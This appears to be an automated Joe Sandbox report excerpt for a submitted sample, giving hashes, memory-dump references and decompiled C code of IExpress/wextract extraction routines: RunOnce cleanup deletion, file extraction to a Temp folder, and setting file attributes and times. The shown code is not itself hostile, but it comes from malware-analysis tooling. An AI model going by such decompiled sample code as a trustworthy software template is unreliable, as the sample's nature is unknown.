                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E5334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-183442868
                                                                                                                                                                                                      • Opcode ID: b433ace48913dff9cbaaef7b41eb09297ea3a16bac6f4f7ba4af6e489202db82
                                                                                                                                                                                                      • Instruction ID: cc8f850ed1e4f99b24287e16792f9e944ab06282128db99c06638d4d46ece8ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b433ace48913dff9cbaaef7b41eb09297ea3a16bac6f4f7ba4af6e489202db82
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A21F6316006C4DFFB709B21ED897A937F0BB04B55F08056AE9457A1B1CFB95E84CB81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E1FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0xe8530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x000e1fee
                                                                                                                                                                                                      0x000e2005
                                                                                                                                                                                                      0x000e200d
                                                                                                                                                                                                      0x000e2017
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2020
                                                                                                                                                                                                      0x000e200d
                                                                                                                                                                                                      0x000e2029

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,000E538C,?,?,000E538C), ref: 000E2005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(000E538C,wextract_cleanup2,?,?,000E538C), ref: 000E2017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000E538C,?,?,000E538C), ref: 000E2020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 849931509-3354236729
                                                                                                                                                                                                      • Opcode ID: c3c6fcee85735ba0c33f6ec6d2d98c9c3c792a2710d6c557c4e183eca3893b33
                                                                                                                                                                                                      • Instruction ID: 500f797c7b70adacca873e59bdb647ad23d08517f8294aa32fb0d50da8cdec0d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3c6fcee85735ba0c33f6ec6d2d98c9c3c792a2710d6c557c4e183eca3893b33
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E04F32650398FFEB219B92EC8EF597B6DE705B80F100195BA08B80A2EB656E14D705
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xe91d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E000E4E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E000E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xe8584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xe91e4;
                                                                                                                                                                                                      						_t58 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xe91e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe91e4;
                                                                                                                                                                                                      						_t30 = E000E4702( &_v268, 0xe91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E000E476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E000E4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E000E47E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe93f4 =  *0xe93f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xe91e4;
                                                                                                                                                                                                      						_t63 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xe91e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe91e4;
                                                                                                                                                                                                      						_t30 = E000E4702( &_v268, 0xe91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E000E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E000E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E000E4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x000e4cd0
                                                                                                                                                                                                      0x000e4cdb
                                                                                                                                                                                                      0x000e4ce0
                                                                                                                                                                                                      0x000e4ce2
                                                                                                                                                                                                      0x000e4cee
                                                                                                                                                                                                      0x000e4cf2
                                                                                                                                                                                                      0x000e4d0e
                                                                                                                                                                                                      0x000e4d0e
                                                                                                                                                                                                      0x000e4d11
                                                                                                                                                                                                      0x000e4e83
                                                                                                                                                                                                      0x000e4e88
                                                                                                                                                                                                      0x000e4e98
                                                                                                                                                                                                      0x000e4e98
                                                                                                                                                                                                      0x000e4d17
                                                                                                                                                                                                      0x000e4d17
                                                                                                                                                                                                      0x000e4d1a
                                                                                                                                                                                                      0x000e4d2f
                                                                                                                                                                                                      0x000e4d2f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d2f
                                                                                                                                                                                                      0x000e4d1c
                                                                                                                                                                                                      0x000e4d1c
                                                                                                                                                                                                      0x000e4d1f
                                                                                                                                                                                                      0x000e4dcb
                                                                                                                                                                                                      0x000e4dd0
                                                                                                                                                                                                      0x000e4dd2
                                                                                                                                                                                                      0x000e4ddd
                                                                                                                                                                                                      0x000e4ddd
                                                                                                                                                                                                      0x000e4de3
                                                                                                                                                                                                      0x000e4de8
                                                                                                                                                                                                      0x000e4ded
                                                                                                                                                                                                      0x000e4ded
                                                                                                                                                                                                      0x000e4def
                                                                                                                                                                                                      0x000e4df0
                                                                                                                                                                                                      0x000e4df0
                                                                                                                                                                                                      0x000e4df4
                                                                                                                                                                                                      0x000e4df4
                                                                                                                                                                                                      0x000e4df6
                                                                                                                                                                                                      0x000e4df9
                                                                                                                                                                                                      0x000e4dfc
                                                                                                                                                                                                      0x000e4dfc
                                                                                                                                                                                                      0x000e4dfe
                                                                                                                                                                                                      0x000e4dff
                                                                                                                                                                                                      0x000e4dff
                                                                                                                                                                                                      0x000e4e03
                                                                                                                                                                                                      0x000e4e08
                                                                                                                                                                                                      0x000e4e0a
                                                                                                                                                                                                      0x000e4e0f
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x000e4e18
                                                                                                                                                                                                      0x000e4e20
                                                                                                                                                                                                      0x000e4e25
                                                                                                                                                                                                      0x000e4e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e33
                                                                                                                                                                                                      0x000e4e38
                                                                                                                                                                                                      0x000e4e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e40
                                                                                                                                                                                                      0x000e4e51
                                                                                                                                                                                                      0x000e4e56
                                                                                                                                                                                                      0x000e4e5b
                                                                                                                                                                                                      0x000e4e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e6a
                                                                                                                                                                                                      0x000e4e6f
                                                                                                                                                                                                      0x000e4e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e77
                                                                                                                                                                                                      0x000e4e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e7d
                                                                                                                                                                                                      0x000e4d25
                                                                                                                                                                                                      0x000e4d25
                                                                                                                                                                                                      0x000e4d28
                                                                                                                                                                                                      0x000e4d36
                                                                                                                                                                                                      0x000e4d3b
                                                                                                                                                                                                      0x000e4d40
                                                                                                                                                                                                      0x000e4d40
                                                                                                                                                                                                      0x000e4d42
                                                                                                                                                                                                      0x000e4d43
                                                                                                                                                                                                      0x000e4d43
                                                                                                                                                                                                      0x000e4d47
                                                                                                                                                                                                      0x000e4d4a
                                                                                                                                                                                                      0x000e4d4a
                                                                                                                                                                                                      0x000e4d4c
                                                                                                                                                                                                      0x000e4d4f
                                                                                                                                                                                                      0x000e4d4f
                                                                                                                                                                                                      0x000e4d51
                                                                                                                                                                                                      0x000e4d52
                                                                                                                                                                                                      0x000e4d52
                                                                                                                                                                                                      0x000e4d56
                                                                                                                                                                                                      0x000e4d5b
                                                                                                                                                                                                      0x000e4d5d
                                                                                                                                                                                                      0x000e4d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d67
                                                                                                                                                                                                      0x000e4d6f
                                                                                                                                                                                                      0x000e4d74
                                                                                                                                                                                                      0x000e4d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d7c
                                                                                                                                                                                                      0x000e4d84
                                                                                                                                                                                                      0x000e4d89
                                                                                                                                                                                                      0x000e4d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d94
                                                                                                                                                                                                      0x000e4d99
                                                                                                                                                                                                      0x000e4d9e
                                                                                                                                                                                                      0x000e4da1
                                                                                                                                                                                                      0x000e4daa
                                                                                                                                                                                                      0x000e4daa
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4db5
                                                                                                                                                                                                      0x000e4dbb
                                                                                                                                                                                                      0x000e4dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4dc3
                                                                                                                                                                                                      0x000e4dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4dc5
                                                                                                                                                                                                      0x000e4dbd
                                                                                                                                                                                                      0x000e4d2a
                                                                                                                                                                                                      0x000e4d2a
                                                                                                                                                                                                      0x000e4d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d2d
                                                                                                                                                                                                      0x000e4cf8
                                                                                                                                                                                                      0x000e4cfd
                                                                                                                                                                                                      0x000e4d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 000E4DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 000E4DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-183442868
                                                                                                                                                                                                      • Opcode ID: 0194aee21e667eabedb3ffd47ff14f2a4a7b3cadeffcbe24863da9c2b15a908a
                                                                                                                                                                                                      • Instruction ID: 257285bdc946dd2a8f263c72a533352c6277e1b53e464701a06542993dd73dd1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0194aee21e667eabedb3ffd47ff14f2a4a7b3cadeffcbe24863da9c2b15a908a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A54157366081818FCB758F3ADD446F973E6EB46700F1446A8D882B7282DF31DE4AC790
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xe8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xe8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x000e4c40
                                                                                                                                                                                                      0x000e4c4a
                                                                                                                                                                                                      0x000e4c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4c70
                                                                                                                                                                                                      0x000e4c70
                                                                                                                                                                                                      0x000e4c7e
                                                                                                                                                                                                      0x000e4c86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4c8a

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 000E4C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E4C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 000E4C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: c803ec8a4d575148e886c44270e4329d98d5124db9d7dffb55fcd675b4adf35b
                                                                                                                                                                                                      • Instruction ID: e31da6ce5d3e623b71acc0468cd79e71e07dd674f80629f1d4332a908829965a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c803ec8a4d575148e886c44270e4329d98d5124db9d7dffb55fcd675b4adf35b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66F0BB7260124C6F9BA9DFB5CC48DFB77ECEB0D744744452BA415E2050EA34F914D761
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x000e4880
                                                                                                                                                                                                      0x000e488c
                                                                                                                                                                                                      0x000e4894
                                                                                                                                                                                                      0x000e48a0
                                                                                                                                                                                                      0x000e48c9
                                                                                                                                                                                                      0x000e48ce
                                                                                                                                                                                                      0x000e48a2
                                                                                                                                                                                                      0x000e48a8
                                                                                                                                                                                                      0x000e48b7
                                                                                                                                                                                                      0x000e48bc
                                                                                                                                                                                                      0x000e48aa
                                                                                                                                                                                                      0x000e48ac
                                                                                                                                                                                                      0x000e48ac
                                                                                                                                                                                                      0x000e48a8
                                                                                                                                                                                                      0x000e48de
                                                                                                                                                                                                      0x000e48e7
                                                                                                                                                                                                      0x000e490b
                                                                                                                                                                                                      0x000e48ee
                                                                                                                                                                                                      0x000e48f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4902

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,000E4A23,?,000E4F67,*MEMCAB,00008000,00000180), ref: 000E48DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,000E4F67,*MEMCAB,00008000,00000180), ref: 000E4902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
